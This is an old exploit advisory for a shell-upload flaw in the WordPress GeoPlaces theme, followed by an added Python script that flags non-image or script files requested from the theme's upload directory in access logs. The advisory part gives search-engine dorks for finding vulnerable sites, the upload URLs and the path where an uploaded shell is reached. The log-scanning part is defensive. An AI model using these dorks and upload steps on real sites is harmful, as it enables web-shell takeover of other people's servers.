Thursday, 27 December 2012

WordPress GeoPlaces Themes | shell upload vulnerability

Title : WordPress GeoPlaces Themes | shell upload vulnerability
Author : Panda Undetected
Category : web-apps
Contact : panda-undetected@mail.com
Facebook : hozni.monsterjack
Homepage : http://4rtcode.net/
Vendor : http://www.geotheme.com/
Date : 14-November-2012
Tested on : any OS
Dork :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)"
===========================
exploit -->>
- http://127.0.0.1/?ptype=post_listing
- http://127.0.0.1/?ptype=post_event
- http://127.0.0.1/path/?ptype=post_listing
- http://127.0.0.1/path/?ptype=post_event
view -->>
- http://127.0.0.1/wp-content/themes/GeoPlaces/images/tmp/[here]
- http://127.0.0.1/path/wp-content/themes/GeoPlaces/images/tmp/[here]
note -->>
- null
thanks to -->>
- Allah my GOD, Muhammad my PROPHET, Indonesian Hacker.

video -->>
http://Z190T.com/video/
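
For site owners, one way to check web server access logs for non-image files being requested from the tmp directory listed under "view" above. This is an added example, not part of the original advisory; the image allowlist, the script-extension list, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory named in the advisory (compared case-insensitively).
TMP_DIR = "/wp-content/themes/geoplaces/images/tmp/"
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}   # assumption: only images belong here
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml", "phar", "pl", "cgi"}

# Common/combined log format: ip - - [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Dec/2012:10:00:01 +0000] "GET /wp-content/themes/GeoPlaces/images/tmp/photo1.jpg HTTP/1.1" 200 51234',
    '198.51.100.7 - - [27/Dec/2012:10:02:13 +0000] "GET /wp-content/themes/GeoPlaces/images/tmp/a1.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [27/Dec/2012:10:02:40 +0000] "GET /path/wp-content/themes/GeoPlaces/images/tmp/a1.PhP.jpg?x=1 HTTP/1.1" 200 312',
    '198.51.100.9 - - [27/Dec/2012:10:05:02 +0000] "GET /wp-content/themes/GeoPlaces/images/tmp/notes%2Etxt HTTP/1.1" 404 0',
    '192.0.2.10 - - [27/Dec/2012:10:06:00 +0000] "GET /?ptype=post_listing HTTP/1.1" 200 9000',
]

def classify(target):
    """Return why a request target is suspicious, or None if it is not."""
    path = unquote(urlsplit(target).path).lower()
    idx = path.find(TMP_DIR)
    if idx < 0:
        return None                      # outside the theme's tmp directory
    name = path[idx + len(TMP_DIR):].rsplit("/", 1)[-1]
    if not name:
        return None                      # bare directory request
    exts = name.split(".")[1:]
    if any(e in SCRIPT_EXT for e in exts):
        return "script extension"        # also catches names like x.php.jpg
    if not exts or exts[-1] not in IMAGE_EXT:
        return "non-image file"
    return None

def find_suspicious(lines):
    """Return (client_ip, target, status, reason) for each flagged line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                     # skip lines in another format
        reason = classify(m.group(3))
        if reason:
            hits.append((m.group(1), m.group(3), int(m.group(4)), reason))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 means the file exists on disk and should be inspected and removed; the same allowlist can be applied to a directory listing of the tmp folder itself.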

